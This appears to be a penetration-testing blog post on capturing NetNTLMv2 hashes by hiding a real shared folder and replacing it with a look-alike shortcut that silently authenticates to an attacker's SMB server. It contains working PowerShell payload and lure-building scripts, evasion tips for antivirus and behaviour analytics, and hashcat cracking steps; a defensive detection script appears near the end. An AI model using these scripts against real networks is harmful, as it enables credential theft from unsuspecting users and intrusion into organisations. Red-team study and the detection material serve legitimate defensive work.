Capturing hashes with hidden folders, lnk files and smbserver by @_markmo_

Mark Mo
4 min read · Sep 9, 2018

I saw some malware using hidden folders and lnk files to execute a malicious payload. I thought, why not use that to capture hashes instead. This has probably been done before. However, it was interesting enough to me to do a proof of concept and reshare the idea.

This assumes you already have an initial foothold on the network. The ideal spot is a folder that many people open and where you have write access: a shared documentation folder, or any cluster of folders that gets a lot of traffic.

This may slip past antivirus, because the executable does nothing malicious on its own (it opens a file on a network share and launches Explorer), and it may slip past user behaviour analytics, because it is the victim's own workstation that initiates an ordinary SMB connection to our server.

Right, let's get to work. The first thing to do is create, on our own machine, the folder and the file that our SMB server will serve; that path is where we will send the victim's SMB connection.

Next we start our SMB server to listen for incoming connections (here is the Python for that: https://github.com/CoreSecurity/impacket/blob/master/examples/smbserver.py). Start it with -smb2support, since current Windows clients have SMB1 disabled and will otherwise fail to connect; the NetNTLM response is printed to the console as each client authenticates.

Now we select the folder we are going to target. Again, this could be something like the root of a shared documentation folder. I'm using a single folder here as a proof of concept; if I wrote a tool I would target folders recursively.

Now that we have the path to our folder, we need a quick program that does two things:

1. Make a connection to the share on our SMB server (this SMB session is what leaks the NetNTLM hash)

2. Take the user to the folder they clicked on, so they don't notice anything is happening

Here is the entire program. It's really just two lines of code wrapped in an empty try/catch. I chose a Windows Forms application and commented out the first three generated lines of Main so the user sees no window and no other visual indication of what is occurring. I was a little lazy and launched a new explorer.exe to take the user to their destination; otherwise I would have had to grab the existing Explorer process and make it navigate to the folder. You get the idea, though.
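As an added example (not the author's program, which is a compiled C# Windows Forms executable and is not reproduced here), the same two steps written as a PowerShell script. It assumes an attacker SMB server at 10.0.0.5 exposing a share called share that contains trigger.txt, and a real folder named OriginalFolder next to the script; all three are placeholders.

```powershell
# Added example, not the author's code: PowerShell version of the two-step payload.
# Assumed placeholders: attacker share \\10.0.0.5\share\trigger.txt and a real
# folder called OriginalFolder located next to this script.
param(
    [string]$ShareFile   = '\\10.0.0.5\share\trigger.txt',  # assumed attacker share
    [string]$Destination = ''                               # real folder; defaulted below
)

# Default to a folder named OriginalFolder next to this script (assumed layout).
if (-not $Destination) {
    $Destination = Join-Path $PSScriptRoot 'OriginalFolder'
}

# Step 1: open a file on the attacker's share. Merely resolving the UNC path makes
# the SMB client negotiate and authenticate with NTLM, and that NetNTLMv2 response
# is what the server captures. The file's content never matters, and any error is
# swallowed, like the empty try/catch in the original program.
try {
    [void](Get-Item -LiteralPath $ShareFile -ErrorAction Stop)
} catch {
    # share unreachable or access denied: the authentication has already happened
}

# Step 2: open Explorer at the real folder so the user lands where they meant to go.
Start-Process -FilePath 'explorer.exe' -ArgumentList ('"{0}"' -f $Destination)
```

A shortcut cannot point at a .ps1 directly (that would open it in Notepad); its target has to be powershell.exe with -WindowStyle Hidden -ExecutionPolicy Bypass -File "...\runme.ps1" as the arguments, and even then a console window flashes briefly, which is one reason the author's compiled executable with the form hidden is the quieter choice. Using an IP address rather than a hostname in the UNC path takes the client straight to NTLM instead of attempting Kerberos first.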

Take the exe and drop it inside the real target folder (the one the user actually wants to reach, here called OriginalFolder), then right-click it and copy it.

Now go back up to the directory that contains OriginalFolder and use Paste shortcut to create a shortcut to runme.exe.

Next rename the shortcut to “OriginalFolder”, exactly the same name as the real folder. Explorer never displays the .lnk extension, so the two names look identical.

Change the icon: right-click the shortcut, select Properties, then Change Icon.

Select the icon that looks the most like a folder (the stock folder icons live in %SystemRoot%\System32\shell32.dll if the dialog only offers the exe's own icon).

Your folder should look like this

Next mark the REAL folder as hidden by right-clicking it, opening Properties and ticking Hidden.

When you hit Apply, only the look-alike “folder” appears to be there! Two caveats: the shortcut still carries the small arrow overlay on its icon, and a user who has turned on “Hidden items” in Explorer's View tab will see both entries.
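The manual steps above, scripted. This is an added example and not from the original post; it assumes the writable share root and the real folder name are passed in, that the author's runme.exe has already been copied into the real folder, and that index 3 of shell32.dll is the stock folder icon (true on current Windows builds, but check how it renders on the target).

```powershell
# Added example, not the author's code: builds the look-alike shortcut and hides
# the real folder. Assumptions: $Root is the writable shared directory, $FolderName
# is the real subfolder users open, and runme.exe is already inside that subfolder.
param(
    [Parameter(Mandatory)] [string]$Root,         # e.g. \\fileserver\docs
    [Parameter(Mandatory)] [string]$FolderName,   # e.g. OriginalFolder
    [string]$PayloadName = 'runme.exe'            # assumed payload name
)

$real    = Join-Path $Root $FolderName
$payload = Join-Path $real $PayloadName
$lnkPath = Join-Path $Root ($FolderName + '.lnk')   # Explorer never shows the .lnk extension

if (-not (Test-Path -LiteralPath $payload -PathType Leaf)) {
    throw "payload not found: $payload"
}

# "Paste shortcut" and the rename, done in one go: the .lnk gets the real folder's name.
$shell = New-Object -ComObject WScript.Shell
$lnk   = $shell.CreateShortcut($lnkPath)
$lnk.TargetPath       = $payload
$lnk.WorkingDirectory = $real
# Change Icon: index 3 of shell32.dll is the stock closed-folder icon (assumption:
# the index has been stable across builds but is not a documented contract).
$lnk.IconLocation     = "$env:SystemRoot\System32\shell32.dll,3"
$lnk.Save()

# Mark the real folder Hidden so a default Explorer view lists only the shortcut.
$dir = Get-Item -LiteralPath $real -Force
$dir.Attributes = $dir.Attributes -bor [System.IO.FileAttributes]::Hidden

# What a default view now shows: Get-ChildItem without -Force omits hidden entries,
# exactly like Explorer with "Hidden items" unticked, so only the look-alike remains.
Get-ChildItem -LiteralPath $Root | Select-Object Name, Attributes
```

Run it from a machine that already has write access to the share, for example with .\Build-Lure.ps1 -Root '\\fileserver\docs' -FolderName 'OriginalFolder' (script name and paths are placeholders). The final listing is the quick self-check: if the real folder still appears, the Hidden attribute did not apply.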

Now when the user clicks on what looks like the folder, the shortcut actually points at an exe, so the exe first visits our SMB server's share and only then takes the user to their real destination folder.

So the user clicks what they think is a folder and lands where they wanted to go (the real destination).

However, the SMB server has already done its work, because the user's machine authenticated to it and left behind its NetNTLMv2 response. Cracking that response is what follows here; where SMB signing is not enforced, the same connection could instead be relayed, but that is outside the scope of this post.
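The flip side, for whoever defends the share. This added detection sweep (not part of the original post) walks a share root with hidden entries included and reports every .lnk whose display name matches a hidden directory beside it, together with where the shortcut really points; the only assumption is the root path you pass in.

```powershell
# Added example, not from the post: a defender's sweep for the hidden-folder lure.
# Assumption: $Root is the share (or local directory) to audit; nothing else is assumed.
param([Parameter(Mandatory)] [string]$Root)

function Find-FolderLures {
    param([string]$Path)
    $shell = New-Object -ComObject WScript.Shell
    # -Force includes hidden entries, which is the whole point of the check.
    $entries = Get-ChildItem -LiteralPath $Path -Recurse -Force -ErrorAction SilentlyContinue

    # Index every directory carrying the Hidden attribute by its full path.
    $hiddenDirs = @{}
    foreach ($e in $entries) {
        if ($e.PSIsContainer -and ($e.Attributes -band [IO.FileAttributes]::Hidden)) {
            $hiddenDirs[$e.FullName.ToLowerInvariant()] = $e
        }
    }

    # A shortcut "X.lnk" sitting next to a hidden directory "X" is the lure pattern.
    foreach ($e in $entries) {
        if ($e.PSIsContainer -or $e.Extension -ne '.lnk') { continue }
        $twin = Join-Path $e.DirectoryName $e.BaseName
        if ($hiddenDirs.ContainsKey($twin.ToLowerInvariant())) {
            $lnk = $shell.CreateShortcut($e.FullName)   # reads the existing .lnk
            [pscustomobject]@{
                Shortcut  = $e.FullName
                HiddenDir = $twin
                Target    = $lnk.TargetPath
                Arguments = $lnk.Arguments
                Icon      = $lnk.IconLocation
            }
        }
    }
}

Find-FolderLures -Path $Root | Format-Table -AutoSize
```

The Target and Icon columns are what make a hit obvious: a "folder" whose shortcut runs an executable and borrows a shell32.dll folder icon has no legitimate reason to exist. On a large share the recursive walk is slow, so run it on a schedule rather than interactively, and pair it with network-side monitoring for workstations opening SMB sessions to hosts that are not file servers, since that outbound connection is the other half of this technique.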

All we need to do now is crack their password with hashcat (I'm using the copy that comes installed on Kali Linux).

Copy the highlighted hash line from the smbserver output into a text file

The command is simple: smbserver prints NetNTLMv2 responses in the format hashcat expects for mode 5600 (NetNTLMv2), so the file can be fed to it as-is together with a wordlist

And run hashcat against it

And you can see it was cracked: there is my awesome password

I hope you enjoyed my first write up.


Mark Mo

@fashionproof.bsky.social on Bluesky, @_markmo_ on Twitter